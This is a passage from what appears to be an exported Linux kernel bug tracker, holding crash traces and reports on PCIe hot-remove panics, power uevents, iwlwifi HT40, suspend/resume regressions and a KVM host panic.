CR0: 000000008005003b [ 329.616431] CR2: ffffffffff600400 CR3: 0000000001c0c000 CR4: 00000000000007e0 [ 329.701687] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 329.786935] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 [ 329.872185] Process kworker/u:0 (pid: 6, threadinfo ffff8807bde16000, task ffff8807bde1a680) [ 329.973006] Stack: [ 329.997000] 0000000000000006 ffff8807bb49b3d8 0000000000000000 ffff8807bb49b3d8 [ 330.085822] ffff8807bde17c88 ffffffff81380f42 2222222222222222 ffff8807bb49b3d8 [ 330.174627] ffff8807bde17cb8 ffffffff81380fb4 0000000000000000 ffff8807bb49b3d8 [ 330.263427] Call Trace: [ 330.292616] [&lt;ffffffff81380f42&gt;] pci_stop_dev+0xb2/0xd0 [ 330.356064] [&lt;ffffffff81380fb4&gt;] pci_stop_bus_device+0x54/0x60 [ 330.426778] [&lt;ffffffff81381156&gt;] pci_stop_and_remove_bus_device+0x16/0x30 [ 330.508919] [&lt;ffffffff8138894b&gt;] remove_callback+0x2b/0x40 [ 330.575487] [&lt;ffffffff8125a82a&gt;] sysfs_schedule_callback_work+0x1a/0x80 [ 330.655551] [&lt;ffffffff81091b81&gt;] process_one_work+0x241/0x5f0 [ 330.725228] [&lt;ffffffff81091b0f&gt;] ? process_one_work+0x1cf/0x5f0 [ 330.796981] [&lt;ffffffff8125a810&gt;] ? sysfs_schedule_callback+0x210/0x210 [ 330.876002] [&lt;ffffffff81093d3b&gt;] worker_thread+0x12b/0x3f0 [ 330.942567] [&lt;ffffffff81093c10&gt;] ? manage_workers+0x180/0x180 [ 331.012243] [&lt;ffffffff81099f9e&gt;] kthread+0xee/0x100 [ 331.071546] [&lt;ffffffff810e1839&gt;] ? __lock_release+0x129/0x190 [ 331.141223] [&lt;ffffffff81099eb0&gt;] ? __init_kthread_worker+0x70/0x70 [ 331.216099] [&lt;ffffffff816b8aec&gt;] ret_from_fork+0x7c/0xb0 [ 331.280585] [&lt;ffffffff81099eb0&gt;] ? __init_kthread_worker+0x70/0x70 [ 331.355453] Code: 89 65 f0 4c 89 6d f8 66 66 66 66 90 31 c0 49 89 fc 48 c7 c7 35 ee a3 81 e8 70 83 31 00 49 8b 44 24 10 48 8b 58 38 48 85 db 74 48 &lt;80&gt; 7b 4a 00 74 42 48 83 bb 88 00 00 00 00 74 38 31 c0 48 c7 c7 [ 331.587982] RIP [&lt;ffffffff813928f8&gt;] pcie_aspm_exit_link_state+0x38/0x190 [ 331.670227] RSP &lt;ffff8807bde17c48&gt; [ 331.711935] ---[ end trace 359d14e0593f23af ]--- [ 331.767128] Kernel panic - not syncing: Fatal exception [ 331.829701] ------------[ cut here ]------------ [ 331.884839] WARNING: at arch/x86/kernel/smp.c:123 native_smp_send_reschedule+0x5c/0x60() [ 331.981506] Hardware name: PRIMEQUEST 1800E [ 332.031449] Modules linked in: ip6table_filter ip6_tables ebtable_nat ebtables nf_conntrack_ipv4 nf_defrag_ipv4 xt_state nf_conntrack ipt_REJECT xt_CHECKSUM iptable_mangle iptable_filter ip_tables bridge stp llc sunrpc binfmt_misc dm_mirror dm_region_hash dm_log dm_mod vhost_net macvtap macvlan tun uinput iTCO_wdt iTCO_vendor_support coretemp kvm_intel kvm crc32c_intel microcode pcspkr lpc_ich mfd_core sg i2c_i801 i2c_core ioatdma i7core_edac edac_core e1000e igb dca ptp pps_core sd_mod crc_t10dif megaraid_sas mptsas mptscsih mptbase scsi_transport_sas scsi_mod [ 332.631448] Pid: 6, comm: kworker/u:0 Tainted: G D W 3.8.0-rc6-aspm-pcie-fix+ #58 [ 332.729156] Call Trace: [ 332.758334] &lt;IRQ&gt; [&lt;ffffffff8106dd5f&gt;] warn_slowpath_common+0x7f/0xc0 [ 332.837472] [&lt;ffffffff8106ddba&gt;] warn_slowpath_null+0x1a/0x20 [ 332.907144] [&lt;ffffffff8103db0c&gt;] native_smp_send_reschedule+0x5c/0x60 [ 332.985129] [&lt;ffffffff810bc027&gt;] trigger_load_balance+0x357/0x4f0 [ 333.058957] [&lt;ffffffff810aab76&gt;] scheduler_tick+0x116/0x150 [ 333.126557] [&lt;ffffffff8108093e&gt;] update_process_times+0x6e/0x90 [ 333.198305] [&lt;ffffffff810d8359&gt;] tick_sched_handle+0x39/0x80 [ 333.266939] [&lt;ffffffff810d8584&gt;] tick_sched_timer+0x54/0x90 [ 333.334541] [&lt;ffffffff8109f613&gt;] __run_hrtimer+0x83/0x320 [ 333.400060] [&lt;ffffffff810d8530&gt;] ? tick_nohz_handler+0xc0/0xc0 [ 333.470773] [&lt;ffffffff8109fb56&gt;] hrtimer_interrupt+0x106/0x280 [ 333.541489] [&lt;ffffffff810b3fe7&gt;] ? irqtime_account_irq+0xe7/0x100 [ 333.615316] [&lt;ffffffff816ba949&gt;] smp_apic_timer_interrupt+0x69/0x99 [ 333.691221] [&lt;ffffffff816b9872&gt;] apic_timer_interrupt+0x72/0x80 [ 333.762968] &lt;EOI&gt; [&lt;ffffffff816aab60&gt;] ? panic+0x1a6/0x1ee [ 333.830680] [&lt;ffffffff816aab5c&gt;] ? panic+0x1a2/0x1ee [ 333.891012] [&lt;ffffffff81071ca8&gt;] ? kmsg_dump+0x1d8/0x2a0 [ 333.955492] [&lt;ffffffff81071af6&gt;] ? kmsg_dump+0x26/0x2a0 [ 334.018937] [&lt;ffffffff81071c90&gt;] ? kmsg_dump+0x1c0/0x2a0 [ 334.083424] [&lt;ffffffff816b022c&gt;] oops_end+0xdc/0xf0 [ 334.142717] [&lt;ffffffff8101aa8b&gt;] die+0x5b/0x90 [ 334.196816] [&lt;ffffffff816afe0c&gt;] do_general_protection+0xdc/0x160 [ 334.270643] [&lt;ffffffff816af2a3&gt;] ? restore_args+0x30/0x30 [ 334.336165] [&lt;ffffffff816af518&gt;] general_protection+0x28/0x30 [ 334.405839] [&lt;ffffffff813928f8&gt;] ? pcie_aspm_exit_link_state+0x38/0x190 [ 334.485897] [&lt;ffffffff813928ea&gt;] ? pcie_aspm_exit_link_state+0x2a/0x190 [ 334.565955] [&lt;ffffffff81380f42&gt;] pci_stop_dev+0xb2/0xd0 [ 334.629398] [&lt;ffffffff81380fb4&gt;] pci_stop_bus_device+0x54/0x60 [ 334.700114] [&lt;ffffffff81381156&gt;] pci_stop_and_remove_bus_device+0x16/0x30 [ 334.782248] [&lt;ffffffff8138894b&gt;] remove_callback+0x2b/0x40 [ 334.848807] [&lt;ffffffff8125a82a&gt;] sysfs_schedule_callback_work+0x1a/0x80 [ 334.928863] [&lt;ffffffff81091b81&gt;] process_one_work+0x241/0x5f0 [ 334.998539] [&lt;ffffffff81091b0f&gt;] ? process_one_work+0x1cf/0x5f0 [ 335.070290] [&lt;ffffffff8125a810&gt;] ? sysfs_schedule_callback+0x210/0x210 [ 335.149311] [&lt;ffffffff81093d3b&gt;] worker_thread+0x12b/0x3f0 [ 335.215870] [&lt;ffffffff81093c10&gt;] ? manage_workers+0x180/0x180 [ 335.285544] [&lt;ffffffff81099f9e&gt;] kthread+0xee/0x100 [ 335.344837] [&lt;ffffffff810e1839&gt;] ? __lock_release+0x129/0x190 [ 335.414511] [&lt;ffffffff81099eb0&gt;] ? __init_kthread_worker+0x70/0x70 [ 335.489379] [&lt;ffffffff816b8aec&gt;] ret_from_fork+0x7c/0xb0 [ 335.553860] [&lt;ffffffff81099eb0&gt;] ? __init_kthread_worker+0x70/0x70 [ 335.628727] ---[ end trace 359d14e0593f23b0 ]--- *test script* echo -n 1 &gt; /sys/bus/pci/devices/0000\:10\:00.0/remove ; echo -n 1 &gt; /sys/bus/pci/devices/0000\:1a\:01.0/remove *pci topology tree* +-09.0-[10-1e]----00.0-[11-1e]--+-00.0-[12-18]----00.0-[13-18]--+-00.0-[14]--+-00.0 | | | \-00.1 | | +-01.0-[15]--+-00.0 | | | \-00.1 | | +-02.0-[16]----00.0 | | +-03.0-[17]----00.0 | | \-04.0-[18]-- | \-01.0-[19-1e]----00.0-[1a-1e]--+-00.0-[1b]-- | +-01.0-[1c]--+-00.0 | | \-00.1 | +-02.0-[1d]-- | \-03.0-[1e]-- $ lspci -vs 10:00.0 10:00.0 PCI bridge: Integrated Device Technology, Inc. Device 807f (rev 02) (prog-if 00 [Normal decode]) Flags: bus master, fast devsel, latency 0 Bus: primary=10, secondary=11, subordinate=1e, sec-latency=0 I/O behind bridge: 00001000-00005fff Memory behind bridge: 92a00000-937fffff Prefetchable memory behind bridge: 0000000092200000-00000000929fffff Capabilities: &lt;access denied&gt; Kernel driver in use: pcieport Kernel modules: shpchp $ lspci -vs 1a:01.0 1a:01.0 PCI bridge: Integrated Device Technology, Inc. Device 807f (rev 02) (prog-if 00 [Normal decode]) Flags: bus master, fast devsel, latency 0 Bus: primary=1a, secondary=1c, subordinate=1c, sec-latency=0 I/O behind bridge: 00001000-00001fff Memory behind bridge: 92e00000-930fffff Prefetchable memory behind bridge: 0000000092600000-00000000927fffff Capabilities: &lt;access denied&gt; Kernel driver in use: pcieport Kernel modules: shpchp</t>
  </si>
  <si>
    <t>HP Folio 13-2000: Kernel doesn't produce any power related uevents</t>
  </si>
  <si>
    <t>3.7.9</t>
  </si>
  <si>
    <t>2013-03-01 20:58 UTC</t>
  </si>
  <si>
    <t>2013-12-20 02:14 UTC</t>
  </si>
  <si>
    <t>No matter if I'm on battery (discharging) or have the ac adapter plugged in (charging), if I'm plugging the ac adapter in or out – I don't see any power related uevents from the kernel with 'udevadm monitor' or 'udevadm monitor --kernel'. I also tried to change the logging priority of udevadm with 'udevadm control --log-priority=debug' – without any luck. Since the kernel sends no power related uevents, UPower doesn't update the status of the ac adapter (un/plugged). The value 'Updated' for device /org/freedesktop/UPower/devices/line_power_ACAD reported by UPower will always be similar to uptime, no matter how long that is and how often I un/plugged the ac adapter in the meantime. When I booted with the ac adapter plugged in and at some point I plug it out and decided to work on battery my notebook will never be sent into hibernation because UPower thinks the ac adapter is still plugged in. I guess UPower expects an uevent from the kernel. However, UPower seems to force an update of the battery status every 30 seconds (UPowerd tells me: 'No updates on supply /org/freedesktop/UPower/devices/battery_BAT1 for 30 seconds; forcing update'), so the charging level reported by the battery status applet in GNOME corresponds to the reported value in /sys/class/power_supply/BAT1/uevent (POWER_SUPPLY_CAPACITY). I'm sorry for opening this bug report while #54241 is still open, but it seems to me that these are two separate issues. Feel free to close one of those two bugs, if you think that this symptoms are caused by the same bug. You'll find relevant log files at #54241, please tell me if you need more information.</t>
  </si>
  <si>
    <t>Speed regression - no HT40 with 3.8 (Intel iwlwifi)</t>
  </si>
  <si>
    <t>2013-03-05 11:48 UTC</t>
  </si>
  <si>
    <t>2014-05-08 05:43 UTC</t>
  </si>
  <si>
    <t>I've upgraded from 3.5 [1] to 3.8 [2]. Now I get only max 130 Mbit/s wireless connection (5Ghz) - with the old kernel I got 300 Mbit/s. My guess: [ 19.191653] wlan1: capabilities/regulatory prevented using AP HT/VHT configuration, downgraded Output of iw scan dump: BSS 00:26:3e:6f:20:41 (on wlan1) -- associated TSF: 14223052854 usec (0d, 03:57:03) freq: 5180 beacon interval: 100 capability: ESS Privacy SpectrumMgmt ShortSlotTime (0x0511) signal: -43.00 dBm last seen: 3120 ms ago Information elements from Probe Response frame: SSID: eduroam Supported rates: 6.0* 9.0 12.0* 18.0 24.0* 36.0 48.0 54.0 DS Parameter set: channel 36 Country: DE Environment: Indoor/Outdoor Channels [36 - 64] @ 11 dBm Channels [100 - 140] @ 16 dBm RSN: * Version: 1 * Group cipher: TKIP * Pairwise ciphers: TKIP CCMP * Authentication suites: IEEE 802.1X * Capabilities: (0x0000) WPA: * Version: 1 * Group cipher: TKIP * Pairwise ciphers: TKIP CCMP * Authentication suites: IEEE 802.1X * Capabilities: (0x0000) WMM: * Parameter version 1 * BE: CW 15-1023, AIFSN 3 * BK: CW 15-1023, AIFSN 7 * VI: CW 7-15, AIFSN 2, TXOP 3008 usec * VO: CW 3-7, AIFSN 2, TXOP 1504 usec HT capabilities: Capabilities: 0x1ce HT20/HT40 SM Power Save disabled RX HT40 SGI TX STBC RX STBC 1-stream Max AMSDU length: 3839 bytes No DSSS/CCK HT40 Maximum RX AMPDU length 65535 bytes (exponent: 0x003) Minimum RX AMPDU time spacing: 8 usec (0x06) HT TX/RX MCS rate indexes supported: 0-15 HT operation: * primary channel: 36 * secondary channel offset: above * STA channel width: any * RIFS: 0 * HT protection: nonmember * non-GF present: 1 * OBSS non-GF present: 0 * dual beacon: 0 * dual CTS protection: 0 * STBC beacon: 0 * L-SIG TXOP Prot: 0 * PCO active: 0 * PCO phase: 0 Hardware: [ 10.463680] iwlwifi 0000:0c:00.0: loaded firmware version 8.83.5.1 build 33692 [ 10.575321] iwlwifi 0000:0c:00.0: CONFIG_IWLWIFI_DEBUG disabled [ 10.575326] iwlwifi 0000:0c:00.0: CONFIG_IWLWIFI_DEBUGFS enabled [ 10.575328] iwlwifi 0000:0c:00.0: CONFIG_IWLWIFI_DEVICE_TRACING enabled [ 10.575330] iwlwifi 0000:0c:00.0: CONFIG_IWLWIFI_DEVICE_TESTMODE enabled [ 10.575332] iwlwifi 0000:0c:00.0: CONFIG_IWLWIFI_P2P disabled [ 10.575335] iwlwifi 0000:0c:00.0: Detected Intel(R) Ultimate N WiFi Link 5300 AGN, REV=0x24 [1] Linux version 3.5.0-25-generic (buildd@komainu) (gcc version 4.7.2 (Ubuntu/Linaro 4.7.2-2ubuntu1) ) #39-Ubuntu SMP Mon Feb 25 18:26:58 UTC 2013 (Ubuntu 3.5.0-25.39-generic 3.5.7.4) [2] Linux version 3.8.1-030801-generic (root@gomeisa) (gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5) ) #201302280935 SMP Thu Feb 28 14:37:19 UTC 2013</t>
  </si>
  <si>
    <t>Suspend to ram fails for 3.7- and 3.8-series, while working up to 3.6.11 -  Samsung Q35</t>
  </si>
  <si>
    <t>3.7.*, 3.8.*</t>
  </si>
  <si>
    <t>2013-03-06 12:13 UTC</t>
  </si>
  <si>
    <t>Ralph Boehm</t>
  </si>
  <si>
    <t>2013-07-27 23:56 UTC</t>
  </si>
  <si>
    <t>Hello, subject says it: On my old Samsung Q35 (Intel, dual core) laptop, resume after suspend to RAM fails, beginning with the 3.7 kernel series, while working up to 3.6.11. The symptoms are: After trying to resume, the backlight switches on and there seems to be HD activity (as indicated by LED, about 30 sec.), but then I'm stuck with a blinking cursor (seemingly in 80x24 VGA mode) in the upper left corner of the screen. The keyboard seems dead, including Alt-SysRq, thus forcing a hard reboot. Bisecting (1st time, so bear with me) starting from 'linux-stable.git' finally gave me: 73201dbec64aebf6b0dca855b523f437972dc7bb is the first bad commit commit 73201dbec64aebf6b0dca855b523f437972dc7bb Author: H. Peter Anvin &lt;hpa@linux.intel.com&gt; Date: Wed Sep 26 15:02:34 2012 -0700 x86, suspend: On wakeup always initialize cr4 and EFER .... which at least sounds relevant to my untrained eye. Don't know how to proceed or what other info you may need, so feel free to advise / ask! Thanks, Ralph</t>
  </si>
  <si>
    <t>[PATCH] suspend/resume doesn't work, results in reboot</t>
  </si>
  <si>
    <t>2.6.35 and newer</t>
  </si>
  <si>
    <t>2013-03-09 16:26 UTC</t>
  </si>
  <si>
    <t>Fabio Valentini</t>
  </si>
  <si>
    <t>2013-04-07 06:29 UTC</t>
  </si>
  <si>
    <t>Created attachment 94991 [details] patch to add machine to the blacklist How to reproduce on Sony Vaio VGN-FW21M: - make the laptop suspend - press any key - laptop reboots (instead of resuming). Adding acpi_sleep=nonvs to the boot command line fixes the problem, computer resumes just fine. As this is a regression (it used to work some years ago and the bug was introduced with 2.6.35, as far as I can tell), I think it would be good if a fix also found it's way down to stable kernel releases. According to the following commits http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=72ad5d77fb981963edae15eee8196c80238f5ed0 and http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=539986482b0db07b7164ab086d167ab99b4d3061 this system just needs to be added to the blacklist in drivers/acpi/sleep.c in order for suspend/resume to work out of the box (again). I attached a patch that adds this system to the blacklist. Suspend/resume works fine with the modified kernel, without the need for the extra boot parameter. The patch was created against the most recent (at the time of writing) kernel master branch.</t>
  </si>
  <si>
    <t>host panic when "creating guest, doing scp and killing QEMU process" continuously</t>
  </si>
  <si>
    <t>2013-03-14 02:54 UTC</t>
  </si>
  <si>
    <t>2013-04-22 14:14 UTC</t>
  </si>
  <si>
    <t>Environment: ------------ Host OS (ia32/ia32e/IA64):ia32e Guest OS (ia32/ia32e/IA64):ia32e Guest OS Type (Linux/Windows):Linux kvm.git (next branch) Commit:3ab66e8a455a4877889c65a848f2fb32be502f2c qemu-kvm (uq/master) Commit:3e41a753551a906dd9ed66fb0fc34167a6af3ba0 Host Kernel Version:3.7.0 Hardware: SandyBridge-EP server system Bug detailed description: -------------------------- host panic when "creating guest, doing scp and killing QEMU process" continuously. I met this issue when doing the loop for the 268th time or about 300th time. I think the is a regression in kernel side because we found the following result. kvm.git(next branch) + qemu-kvm(uq/master branch) = result 3ab66e8a + 3e41a7535 = Bad 45e3cc7d + 3e41a7535 = Good For the good case above, at least it can't be reproduced in my side when doing the loop for more than 1000 times. Reproduce steps: ---------------- 1. qemu-system-x86_64 -m 1024 -smp 4 -net nic,macaddr=00:12:23:43:53:12 -net tap,script=/etc/kvm/qemu-ifup -hda rhel6u3.qcow --enable-kvm &amp; 2. create a file in the guest 3. scp the file to the host 4. kill the QEMU process of the guest 5. repeat step 1 to step 4 again and again Current result: ---------------- guest hang, and host panic Expected result: ---------------- guest and host work fine Basic root-causing log: (host serial port log) ---------------- NMI backtrace for cpu 25 CPU 25 Pid: 0, comm: swapper/25 Tainted: P 3.7.0 #2 Intel Corporation S2600CP/S2600CP RIP: 0010:[&lt;ffffffff8124f0cd&gt;] [&lt;ffffffff8124f0cd&gt;] intel_idle+0x9e/0xc2 RSP: 0018:ffff88042f1ade08 EFLAGS: 00000046 RAX: 0000000000000030 RBX: 0000000000000010 RCX: 0000000000000001 RDX: 0000000000000000 RSI: ffff88042f1adfd8 RDI: 0000000000000019 RBP: ffff88042f1ade38 R08: 0000000000000000 R09: 000000000000006d R10: 0000000000000003 R11: ffff88083f3324c0 R12: 0000000000000004 R13: 0000000000000030 R14: 0000000000000004 R15: 0000000000000019 FS: 0000000000000000(0000) GS:ffff88083f320000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007ffb9886d0a0 CR3: 0000000001a0b000 CR4: 00000000000427e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Process swapper/25 (pid: 0, threadinfo ffff88042f1ac000, task ffff88042f181040) Stack: 000000192f1adfd8 000000193f32d740 ffff88042f1ade48 ffff88083f339170 000010290c6bf2d2 ffffffff81332c2c ffff88042f1ade48 ffffffff81332c3e ffff88042f1adea8 ffffffff813330f3 ffff880400000004 ffffffff81a44110 Call Trace: [&lt;ffffffff81332c2c&gt;] ? disable_cpuidle+0x10/0x10 [&lt;ffffffff81332c3e&gt;] cpuidle_enter+0x12/0x14 [&lt;ffffffff813330f3&gt;] cpuidle_wrap_enter+0x2f/0x6d [&lt;ffffffff81333141&gt;] cpuidle_enter_tk+0x10/0x12 [&lt;ffffffff81332c52&gt;] cpuidle_enter_state+0x12/0x3a [&lt;ffffffff8133332b&gt;] cpuidle_idle_call+0x12a/0x1df [&lt;ffffffff8100916a&gt;] cpu_idle+0x5e/0xa4 [&lt;ffffffff813f76a6&gt;] start_secondary+0x75/0x77 Code: ff 48 8d 86 38 e0 ff ff 80 e2 08 75 1e 31 d2 48 89 d1 0f 01 c8 0f ae f0 48 8b 86 38 e0 ff ff a8 08 75 08 b1 01 4c 89 e BUG: soft lockup - CPU#6 stuck for 22s! [qemu-system-x86:57320] Modules linked in: ext3 jbd vfat fat loop tun kvm_intel nfsv3 nfs_acl nfsv4 auth_rpcgss nfs fscache dns_resolver lockd pci_s]CPU 6 Pid: 57320, comm: qemu-system-x86 Tainted: P 3.7.0 #2 Intel Corporation S2600CP/S2600CP RIP: 0010:[&lt;ffffffff810797ce&gt;] [&lt;ffffffff810797ce&gt;] smp_call_function_many+0x1cc/0x1dd RSP: 0018:ffff88082c9a5ce8 EFLAGS: 00000202 RAX: 00000000000000ff RBX: ffffffff81a82f50 RCX: 0000000000000001 RDX: 7fffffffffffffff RSI: 00000000000000ff RDI: 000000000000003f RBP: ffff88082c9a5d28 R08: 00000000000000c0 R09: ffff88043f6cce08 R10: 0000000000000004 R11: 0000000000000003 R12: 0000000000000296 R13: ffff88083f20cdd0 R14: 000800002d240040 R15: 0000000000000006 FS: 00007f28ffca9840(0000) GS:ffff88043f6c0000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f28fef664d0 CR3: 000000082cd06000 CR4: 00000000000427e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Process qemu-system-x86 (pid: 57320, threadinfo ffff88082c9a4000, task ffff88082d240040) Stack: 01007f28ee5fcfff ffff88082c9a5d38 ffff88082c9a5d28BUG: soft lockup - CPU#15 stuck for 22s! [python:57408] Modules linked in: ext3 jbd vfat fat loop tun kvm_intel nfsv3 nfs_acl nfsv4 auth_rpcgss nfs fscache dns_resolver lockd pci_s]CPU 15 Pid: 57408, comm: python Tainted: P 3.7.0 #2 Intel Corporation S2600CP/S2600CP RIP: 0010:[&lt;ffffffff810797ce&gt;] [&lt;ffffffff810797ce&gt;] smp_call_function_many+0x1cc/0x1dd RSP: 0018:ffff8808290ab958 EFLAGS: 00000202 RAX: 00000000000000ff RBX: ffffffff81a82f50 RCX: 0000000000000001 RDX: 7fffffffffffffff RSI: 00000000000000ff RDI: 000000000000003f RBP: ffff8808290ab998 R08: 00000000000000c0 R09: ffff88083f2ece08 R10: 0000000000000004 R11: 0000000000000003 R12: 0000000000000292 R13: ffff88083f20cdd0 R14: 000c00003f2f24c0 R15: 000000000000000f FS: 00007f7bab739700(0000) GS:ffff88083f2e0000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000a13c98 CR3: 000000082c0e7000 CR4: 00000000000427e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Process python (pid: 57408, threadinfo ffff8808290aa000, task ffff88082cb83800) Stack: 0100000000000001 0000000000000000 ffff88082e60d200 ffffffff8102c8a2 0000000000000000 0000000000000000 ffffffff81a2f1c0 000000000000ae05 ffff8808290ab9a8 ffffffff810798d4 ffff8808290ab9e8 ffffffff8107990c Call Trace: [&lt;ffffffff8102c8a2&gt;] ? leave_mm+0x43/0x43 [&lt;ffffffff810798d4&gt;] smp_call_function+0x1d/0x21 [&lt;ffffffff8107990c&gt;] on_each_cpu+0x18/0x35 [&lt;ffffffff8102c7c6&gt;] flush_tlb_kernel_range+0x63/0x65 [&lt;ffffffff810ee3df&gt;] __purge_vmap_area_lazy+0x138/0x195 [&lt;ffffffff810f0658&gt;] vm_unmap_aliases+0x15f/0x16e [&lt;ffffffff8102aad9&gt;] change_page_attr_set_clr+0xf4/0x365 [&lt;ffffffff810c9985&gt;] ? __alloc_pages_nodemask+0x183/0x81c [&lt;ffffffff8102afb6&gt;] _set_memory_wb+0x2a/0x2c [&lt;ffffffff81029cde&gt;] ioremap_change_attr+0x26/0x28 [&lt;ffffffff8102ba6b&gt;] kernel_map_sync_memtype+0x69/0xb7 [&lt;ffffffff8102bb7c&gt;] reserve_pfn_range+0xc3/0xdf [&lt;ffffffff812a2a39&gt;] ? memory_open+0x66/0x6f [&lt;ffffffff8102bbc9&gt;] track_pfn_remap+0x31/0x45 [&lt;ffffffff810e2432&gt;] remap_pfn_range+0x80/0x36c [&lt;ffffffff810ccfe1&gt;] ? lru_cache_add_lru+0x25/0x27 [&lt;ffffffff810ec684&gt;] ? page_add_new_anon_rmap+0xc8/0xda [&lt;ffffffff812a305b&gt;] mmap_mem+0x75/0x87 [&lt;ffffffff810ea454&gt;] mmap_region+0x2ba/0x4dc [&lt;ffffffff81005cef&gt;] ? arch_get_unmapped_area_topdown+0x1cb/0x1ff [&lt;ffffffff810ea8be&gt;] do_mmap_pgoff+0x248/0x2a6 [&lt;ffffffff810d9253&gt;] vm_mmap_pgoff+0x6c/0x8b [&lt;ffffffff810e8198&gt;] sys_mmap_pgoff+0xe1/0x114 [&lt;ffffffff81005d40&gt;] sys_mmap+0x1d/0x21 [&lt;ffffffff81407192&gt;] system_call_fastpath+0x16/0x1b Code: 63 28 4c 89 ee 48 c7 c7 d0 41 a0 81 e8 50 6f 38 00 0f ae f0 4c 89 f7 ff 15 58 2b 9a 00 80 7d c7 00 75 04 eb 08 f3 90 f ffff8808244ac140 ffff8808244ac400 00007f28ee4d0000 00007f28ee5fd000 ffff88082d1a0088 ffff88082c9a5d58 ffffffff8102c80a ffff8808244ac140 0000000000000000 Call Trace: [&lt;ffffffff8102c80a&gt;] native_flush_tlb_others+0x29/0x2b [&lt;ffffffff8102cb15&gt;] flush_tlb_mm_range+0x1b2/0x1bb [&lt;ffffffff810e306e&gt;] tlb_flush_mmu+0x3f/0x7b [&lt;ffffffff810e30c1&gt;] tlb_finish_mmu+0x17/0x3c [&lt;ffffffff810e7d45&gt;] unmap_region+0xcf/0xe1 [&lt;ffffffff811411f4&gt;] ? eventfd_write+0x8f/0x17b [&lt;ffffffff810e9c4a&gt;] do_munmap+0x2a6/0x332 [&lt;ffffffff810e9d16&gt;] vm_munmap+0x40/0x5b [&lt;ffffffff810e9d52&gt;] sys_munmap+0x21/0x2a [&lt;ffffffff81407192&gt;] system_call_fastpath+0x16/0x1b Code: 63 28 4c 89 ee 48 c7 c7 d0 41 a0 81 e8 50 6f 38 00 0f ae f0 4c 89 f7 ff 15 58 2b 9a 00 80 7d c7 00 75 04 eb 08 f3 90 f BUG: soft lockup - CPU#4 stuck for 24s! [qemu-system-x86:57338] Modules linked in: ext3 jbd vfat fat loop tun kvm_intel nfsv3 nfs_acl nfsv4 auth_rpcgss nfs fscache dns_resolver lockd pci_s]CPU 4 Pid: 57338, comm: qemu-system-x86 Tainted: P 3.7.0 #2 Intel Corporation S2600CP/S2600CP RIP: 0010:[&lt;ffffffff81079459&gt;] [&lt;ffffffff81079459&gt;] generic_exec_single+0x7f/0x90 RSP: 0018:ffff88082c8e9bc8 EFLAGS: 00000202 RAX: 00000000000000ff RBX: 0000000000000010 RCX: 0000000000000001 RDX: 7fffffffffffffff RSI: 00000000000000ff RDI: 000000000000003f RBP: ffff88082c8e9c08 R08: 00000000000000c0 R09: ffff88043f68ce08 R10: 0000000000000004 R11: ffff88082abf8900 R12: 0000000000000292 R13: ffff88082c8e9b98 R14: 0000000000000002 R15: ffff88043f68cdf0 FS: 00007f28effff700(0000) GS:ffff88043f680000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f28ffcb400d CR3: 000000082cd06000 CR4: 00000000000427e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Process qemu-system-x86 (pid: 57338, threadinfo ffff88082c8e8000, task ffff88082481e040) Stack: 0000000000000286 ffff88043f653000 ffff88043f008040 0000000000000002 ffffffffa011b086 0000000000000001 0000000000000000 0000000000000004 ffff88082c8e9c78 ffffffff810795ea ffff88043f653000 ffff88043f653000 Call Trace: [&lt;ffffffffa011b086&gt;] ? kvm_is_mmio_pfn+0x86/0x86 [kvm] [&lt;ffffffff810795ea&gt;] smp_call_function_single+0xdc/0xf4 [&lt;ffffffffa011b086&gt;] ? kvm_is_mmio_pfn+0x86/0x86 [kvm] [&lt;ffffffffa011b086&gt;] ? kvm_is_mmio_pfn+0x86/0x86 [kvm] [&lt;ffffffff810796e6&gt;] smp_call_function_many+0xe4/0x1dd [&lt;ffffffffa01200d3&gt;] make_all_cpus_request+0xaf/0xba [kvm] [&lt;ffffffffa01200fc&gt;] kvm_make_mclock_inprogress_request+0xe/0x10 [kvm] [&lt;ffffffffa012e71a&gt;] vcpu_enter_guest+0x99/0x64f [kvm] [&lt;ffffffffa033a107&gt;] ? update_exception_bitmap+0x6b/0x6d [kvm_intel] [&lt;ffffffffa03410f5&gt;] ? vmx_vcpu_reset+0x370/0x3e4 [kvm_intel] [&lt;ffffffffa012eda0&gt;] __vcpu_run+0xd0/0x279 [kvm] [&lt;ffffffffa0132836&gt;] kvm_arch_vcpu_ioctl_run+0xe7/0x1a4 [kvm] [&lt;ffffffffa012047e&gt;] kvm_vcpu_ioctl+0x121/0x4e2 [kvm] [&lt;ffffffff81076137&gt;] ? wake_futex+0x57/0x6f [&lt;ffffffff8107623a&gt;] ? futex_wake+0xeb/0xfd [&lt;ffffffff811170de&gt;] do_vfs_ioctl+0x255/0x271 [&lt;ffffffff81078395&gt;] ? sys_futex+0x10b/0x145 [&lt;ffffffff81117153&gt;] sys_ioctl+0x59/0x7d [&lt;ffffffff81407192&gt;] system_call_fastpath+0x16/0x1b Code: 45 c0 4c 89 f7 48 89 c6 e8 c9 72 38 00 48 39 5d c8 75 09 44 89 ef ff 15 d6 2e 9a 00 45 85 ff 75 04 eb 0a f3 90 41 f6 4 Kernel panic - not syncing: Watchdog detected hard LOCKUP on cpu 2 Pid: 57336, comm: qemu-system-x86 Tainted: P 3.7.0 #2 Call 